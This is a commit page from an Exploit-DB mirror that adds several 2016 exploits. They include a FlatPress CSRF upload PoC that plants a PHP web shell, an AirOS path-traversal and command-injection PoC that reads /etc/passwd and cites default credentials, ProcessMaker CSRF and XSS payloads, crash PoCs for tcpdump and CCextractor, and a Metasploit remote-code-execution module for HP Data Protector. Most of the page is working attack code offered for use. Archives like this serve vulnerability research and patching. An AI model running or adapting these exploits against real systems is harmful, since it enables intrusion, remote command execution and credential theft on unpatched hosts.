bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-06-01

Browse source 
6 new exploits

FlatPress 1.0.3 - CSRF Arbitrary File Upload
AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities
ProcessMaker 3.0.1.7 - Multiple vulnerabilities
CCextractor 0.80 - Crash PoC
Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)
TCPDump 4.5.1 - Crash PoC
This commit is contained in:
Offensive Security 2016-06-01 05:01:50 +00:00
parent 22d168d0bc
commit 8164665ff7
7 changed files with 561 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
files.csv
View file

@ -36051,3 +36051,9 @@ id,file,description,date,author,platform,type,port
39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0 39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0
39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80 39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80
39869,platforms/lin_x86-64/shellcode/39869.c,"Linux x86_64 XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux x86_64 XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39870,platforms/php/webapps/39870.html,"FlatPress 1.0.3 - CSRF Arbitrary File Upload",2016-05-31,LiquidWorm,php,webapps,80
39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)",2016-05-31,"Ian Lovering",windows,remote,0
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0

Can't render this file because it is too large.

46
platforms/cgi/webapps/39871.txt Executable file
View file

@ -0,0 +1,46 @@
# AirOS NanoStation M2 v5.6-beta
# Arbitrary File Download & Remote Command Execution
# Tested on: XM.v5.6-beta5.24359.141008.1753 - Build: 2435
# Linux Awesome 2.6.32.63 #1 Wed Oct 8 17:54:30 EEST 2014 mips unknown
#
# Date: May 30, 2016
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>
# Valid credentials are required !.
# Most of devices run default factory user/passwd combination (ubnt:ubnt)
# Take a look at /usr/www/scr.cgi
<?
include("lib/settings.inc");
include("lib/system.inc");
$filename = $fname + ".sh";
$file = $fname + $status;
header("Content-Type: application/force-download");
header("Content-Disposition: attachment; filename=" + $filename);
passthru("cat /tmp/persistent/$file");
exit;
# Arbitrary File Download
# Poc:
GET http://x.x.x.x/scr.cgi?fname=../../../../../etc/passwd%00&status=
Raw Response: dWJudDpWdnB2Q3doY2NGdjZROjA6MDpBZG1pbmlzdHJhdG9yOi9ldGMvcGVyc2lzdGVudDovYmluL3NoCm1jdXNlcjohVnZERThDMkVCMTowOjA6Oi9ldGMvcGVyc2lzdGVudC9tY3VzZXI6L2Jpbi9zaAo=
Base64 Decoded: ubnt:VvpvCwhccFv6Q:0:0:Administrator:/etc/persistent:/bin/sh
mcuser:!VvDE8C2EB1:0:0::/etc/persistent/mcuser:/bin/sh
# Remote Command Execution:
# Poc:
GET http://x.x.x.x/scr.cgi?fname=rc.poststart.sh;cat%20/etc/hosts%00&status=
Raw Response: MTI3LjAuMC4xCWxvY2FsaG9zdC5sb2NhbGRvbWFpbglsb2NhbGhvc3QK
Base64 Decoded: 127.0.0.1 localhost.localdomain localhost

43
platforms/linux/dos/39873.py Executable file
View file

@ -0,0 +1,43 @@
# Exploit Title: CCextractor 0.80 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: http://www.ccextractor.org/
# Software Link: http://www.ccextractor.org/download-ccextractor.html
# Version: 0.80
# Tested on: Ubuntu 14 LTS
# CVE : 0 day
from subprocess import call
from shlex import split
from time import sleep
def crash():
command = './ccextractor crash'
buffer = '\x00\x00\x00\x04ssixssixs'
with open('crash', 'w+b') as file:
file.write(buffer)
try:
call(split(command))
print("Exploit successful! ")
except:
print("Error: Something has gone wrong!")
def main():
print("Author: David Silveiro ")
print(" CCextractor 0.80 Access Violation Crash ")
sleep(2)
crash()
if __name__ == "__main__":
main()

50
platforms/linux/dos/39875.py Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title: tcpdump 4.5.1 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro
# Vendor Homepage: http://www.tcpdump.org
# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
# Version: 4.5.1
# Tested on: Ubuntu 14 LTS
from subprocess import call
from shlex import split
from time import sleep
def crash():
command = 'tcpdump -r crash'
buffer = '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff'
buffer += '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00'
buffer += '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00'
buffer += '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a'
buffer += "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'"
buffer += "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00"
buffer += '\x00\x00\x00\x00\x01\x03\x03\x04'
with open('crash', 'w+b') as file:
file.write(buffer)
try:
call(split(command))
print("Exploit successful! ")
except:
print("Error: Something has gone wrong!")
def main():
print("Author: David Silveiro ")
print(" tcpdump version 4.5.1 Access Violation Crash ")
sleep(2)
crash()
if __name__ == "__main__":
main()

146
platforms/php/webapps/39870.html Executable file
View file

@ -0,0 +1,146 @@
<!DOCTYPE html>
<!--
FlatPress 1.0.3 CSRF Arbitrary File Upload
Vendor: Edoardo Vacchi
Product web page: http://www.flatpress.org
Affected version: 1.0.3
Summary: FlatPress is a blogging engine that saves your posts as
simple text files. Forget about SQL! You just need some PHP.
Desc: The vulnerability is caused due to the improper verification
of uploaded files via the Uploader script using 'upload[]' POST parameter
which allows of arbitrary files being uploaded in '/fp-content/attachs'
directory. The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform actions with
administrative privileges if a logged-in user visits a malicious
web site resulting in execution of arbitrary PHP code by uploading
a malicious PHP script file and execute system commands.
Tested on: Apache/2.4.10
PHP/5.6.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5328
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5328.php
04.04.2016
-->
<html>
<title>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC</title>
<body>
<script type="text/javascript">
function exec(){
var command = document.getElementById("exec");
var url = "http://localhost/flatpress/fp-content/attachs/test.php?cmd=";
var cmdexec = command.value;
window.open(url+cmdexec,"ZSL_iframe");
}
function upload(){
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/flatpress/admin.php?p=uploader&action=default", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary1Ix0O1LgWmzQa0af");
xhr.withCredentials = true;
var body = "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"_wpnonce\"\r\n" +
"\r\n" +
"5a462c73ac\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" +
"\r\n" +
"/flatpress/admin.php?p=uploader\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"test.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"system($_REQUEST[\'cmd\']);\r\n" +
"?\x3e\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload\"\r\n" +
"\r\n" +
"Upload\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<h3>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC Script</h3>
<form action="#">
<button type="button" onclick=upload()>Upload test.php file!</button>
</form><br />
<form action="javascript:exec()">
<input type="text" id="exec" placeholder="Enter a command">
<input type="submit" value="Execute!">
</form><br />
<iframe
style="border:2px;border-style:dashed;color:#d3d3d3"
srcdoc="command output frame"
width="700" height="600"
name="ZSL_iframe">
</iframe>
<br />
<font size="2" color="#d3d3d3">ZSL-2016-5328</font>
</body>
</html>

126
platforms/php/webapps/39872.txt Executable file
View file

@ -0,0 +1,126 @@
######################################################################
# Exploit Title: ProcessMaker v3.0.1.7 Multiple vulnerabilities
# Date: 31/05/2016
# Author: Mickael Dorigny @ information-security.fr
# Vendor or Software Link: http://www.processmaker.com/
# Version: 3.0.1.7
# Category: Multiple Vulnerabilities
######################################################################
ProcessMaker description :
======================================================================
ProcessMaker Inc. is the developer of the ProcessMaker Workflow & BPM Software Suite. ProcessMaker automates form based, approval driven workflow that improves the way information flows between data and systems. ProcessMaker has been downloaded more than 750,000 times and is currently being used by thousands of companies around the world. ProcessMaker has a network of more than 35 partners located on 5 different continents.
Vulnerabilities description :
======================================================================
ProcessMaker v3.0.1.7 is vulnerable to multiple vulnerabilities like :
- Reflected XSS
- Stored XSS
- CSRF (x2)
PoC n°1 - CSRF on Designer Project Creation
======================================================================
Designer Project creation process is vulnerable to CSRF vulnerability. a forged request can be used to force an authentified user with designer project creation rights to create a new Designer project.
PoC:
[REQUEST]
http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject
[POSTDATA]
PRO_TITLE=AAA&PRO_DESCRIPTION=BBB&PRO_CATEGORY=
The following HTML form can be used to exploit this CSRF vulnerability when mixed to phishing technics or auto-submit javascript tricks :
<form method=POST name=form1 action="http://serversysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject">
<input type=text name=PRO_TITLE value=XXX>
<input type=text name=PRO_DESCRIPTION value=XXX>
<input type=text name=PRO_CATEGORY value="">
<input type=submit>
</form>
<script>
window.onload = function(){
document.forms['form1'].submit()
}
</script>
Note that this CSRF vulnerability can be combined with the PoC n°3 that expose a stored XSS vulnerability in the Description input of Designer Project.
Proof of Concept n°2 - CSRF on group creation
======================================================================
Group creation process is vulnerable to CSRF vulnerability, a forged request can be used to force an authentified user with admin rights to create a new group.
PoC :
[REQUEST]
http://server/sysworkflow/en/neoclassic/groups/groups_Ajax?action=saveNewGroup
[POSTDATA]
name=swdcs&status=1
The following HTML form can be used to exploit this CSRF vulnerability when mixed to phishing technics or auto-submit javascript tricks :
<form method=POST name=form1 action="http://192.168.1.14/sysworkflow/en/neoclassic/groups/groups_Ajax?action=saveNewGroup">
<input type=text name=name value=2>
<input type=text name=status value=1>
<input type=submit>
</form>
<script>
window.onload = function(){
document.forms['form1'].submit()
}
</script>
Proof of Concept n°3 - Stored XSS on Designer Project Creation
======================================================================
The "description" input of the designer project creation process is vulnerable to stored XSS. A user can use this input to store an XSS an make other user's browsers executes controlled JavaScript instructions.
PoC
[REQUEST]
http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject
[POSTDATA]
PRO_TITLE=AA<img src=x onerror=alert(1)>A&PRO_DESCRIPTION=BBB&PRO_CATEGORY=
Note that this CSRF vulnerability can be combined with the PoC n°1 that expose a CSRF vulnerability in the Designer Project creation process.
Through this vulnerability, an attacker could tamper with page rendering or redirect victim to fake login page
Proof of Concept n°4 - Reflected Cross-Site Scripting (RXSS) with authentication :
======================================================================
The search form in the Design Project can redirect user to a blank page without HTML code. This page display some information including user request. We can use this situation to execute JavaScript instruction into browser's user.
Note that a search request use POST transmission method, to exploit this vulnerability, an attacker need to trap a user to visit a HTML form with auto-submit Javascript tricks to generate the forged request.
PoC :
[REQUEST]
http://server/sysworkflow/en/neoclassic/processes/processesList
[POSTDATA]
processName=<img src=x onerror=alert(1);>&start=0&limit=25&category=%3Creset%3E
Through this vulnerability, an attacker could tamper with page rendering or redirect victim to fake login page.
Solution:
======================================================================
- Update your Process Manager installation to superior version
Additional resources :
======================================================================
- https://www.youtube.com/watch?v=TO2Fu-pbLI8
- http://www.processmaker.com/
Report timeline :
======================================================================
2016-01-26 : Editor informed for vulnerabilities
2016-01-27 : Editor response, fixes will be part of the next release
2016-05-25 : 3.0.1.8 is released with vulnerabilities corrections
2016-05-31 : Advisory release
Credits :
======================================================================
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr
My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/
--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr

144
platforms/windows/remote/39874.rb Executable file
View file

@ -0,0 +1,144 @@
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => "HP Data Protector Encrypted Communication Remote Command Execution",
'Description' => %q{
This module exploits a well known remote code exection exploit after establishing encrypted control communications with a Data Protector agent. This allows exploitation of Data Protector agents that have been configured to only use encrypted control communications. This exploit works by executing the payload with Microsoft PowerShell so will only work against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows Server 2008 R2."
},
'License' => MSF_LICENSE,
'Author' => [ 'Ian Lovering' ],
'References' =>
[
[ 'CVE', '2016-2004' ],
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'WfsDelay' => 30,
'RPORT' => 5555
},
'Privileged' => false,
'DisclosureDate' => "Apr 18 2016",
'DefaultTarget' => 0))
end
def check
# For the check command
connect
sock.put(rand_text_alpha_upper(64))
response = sock.get_once(-1)
disconnect
if response.nil?
return Exploit::CheckCode::Safe
end
service_version = Rex::Text.to_ascii(response).chop.chomp
if service_version =~ /HP Data Protector/
print_status(service_version)
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def generate_dp_payload
command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ remove_comspec: true, encode_final_payload: true })
payload =
"\x32\x00\x01\x01\x01\x01\x01\x01" +
"\x00\x01\x00\x01\x00\x01\x00\x01" +
"\x01\x00\x20\x32\x38\x00\x5c\x70" +
"\x65\x72\x6c\x2e\x65\x78\x65\x00" +
"\x20\x2d\x65\x73\x79\x73\x74\x65" +
"\x6d('#{command}')\x00"
payload_length = [payload.length].pack('N')
return payload_length + payload
end
def exploit
# Main function
encryption_init_data =
"\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
"\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
"\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
"\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
"\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"
print_status("Initiating connection")
# Open connection
connect
# Send init data
sock.put(encryption_init_data)
begin
buf = sock.get_once
rescue ::EOFError
end
print_status("Establishing encrypted channel")
# Create TLS / SSL context
sock.extend(Rex::Socket::SslTcp)
sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
sock.sslctx.options = OpenSSL::SSL::OP_ALL
# Enable TLS / SSL
sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
sock.sslsock.connect
print_status("Sending payload")
# Send payload
sock.put(generate_dp_payload(), {timeout: 5})
# Close socket
disconnect
print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
end
end